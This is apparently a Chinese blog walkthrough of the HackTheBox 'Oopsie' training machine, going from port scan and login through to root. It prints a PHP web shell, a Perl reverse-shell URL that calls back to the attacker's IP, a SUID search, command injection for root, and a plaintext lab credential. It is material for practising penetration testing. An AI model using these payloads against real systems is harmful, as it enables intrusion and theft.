扫描结果
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-03 06:15 EST
Nmap scan report for 10.10.10.28
Host is up (0.49s latency).
PORT STATE SERVICE VERSION
21/tcp closed ftp
23/tcp closed telnet
53/tcp closed domain
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
110/tcp closed pop3
111/tcp closed rpcbind
113/tcp closed ident
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
256/tcp closed fw1-secureremote
445/tcp closed microsoft-ds
587/tcp closed submission
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
8888/tcp closed sun-answerbook
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.00 seconds
打开对应80端口 http://10.10.10.28/#
看了看没有啥,扫描路径走起
扫出来一个登录 http://10.10.10.28/cdn-cgi/login/i
密码用的是前面window机器获取的!!!wdnmd
进去之后,Account页面
http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1
这个id = 1,爆破一下之后,爆出来30的时候查询到了super admin的id和账户
而在upload界面,就需要super admin的cookie才能访问到上传
使用dirsearch工具可以找到/uploads/
。 上传的php就保存到了这里
这里我使用php一句话反弹shell连上就断,使用perl就可以正常连接。
test.php
<?php echo shell_exec($_GET['shell']);?>
访问link
http://10.10.10.28/uploads/test.php?shell=perl%20-MIO%20-e%20%27$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%2210.10.14.214:4444%22);STDIN-%3Efdopen($c,r);$~-%3Efdopen($c,w);system$_%20while%3C%3E;%27
对应perl命令perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
可看swisskyrepo/PayloadsAllTheThings
连进去之后需要提权
SHELL=/bin/bash script -q /dev/null //见注解1 Ctrl-Z //见注解2 stty raw -echo //见注解3 fg //见注解4 reset //见注解5 xterm //见注解6
- 将在环境变量下将shell设置为/bin/bash且参数为-q和/dev/null的情况下运行脚本,-q参数为静默运行,输出到/dev/null(黑洞)里,如果不加script -q /dev/null不会新启一个bash,shell=/bin/bash只是设置shell为bash,加了以后会给你挂起一个新的shell,并帮你记录所有内容
- 将netcat暂挂至后台
- 将本地终端置于原始模式,以免干扰远程终端
- 将netcat返回到前台,注意:这里不会显示输入的命令
- 重置远程终端,经测试也可以不进行此操作
- 运行xterm 来源 渗透测试练习靶场hackthebox——Starting Point Oopsie攻略_TF0xn的博客-CSDN博客
在目录之间找了找之后,在cdn-cgi/login
找到个db.php
,里边有个账户密码,su 切换过去就有了用户权限。
ls -lh $(find / -perm -u=s -type f 2>/dev/null)
查看有SUID权限 的可执行文件
使用cat /etc/group
查看bugtracker用户组
发现可以运行就直接/usr/bin/bugtracker
执行了,发现看起来是个cat的代码执行,尝试;
命令注入成功,获取了root权限
ls -lRa /root
查找root路径下有什么
-R, –recursive list subdirectories recursively
Inside root’s folder, we see a .config folder, which contains a FileZilla config file with the credentials ftpuser / mc@F1l3ZilL4 visible in plain text.
「真诚赞赏,手留余香」
真诚赞赏,手留余香
使用微信扫描二维码完成支付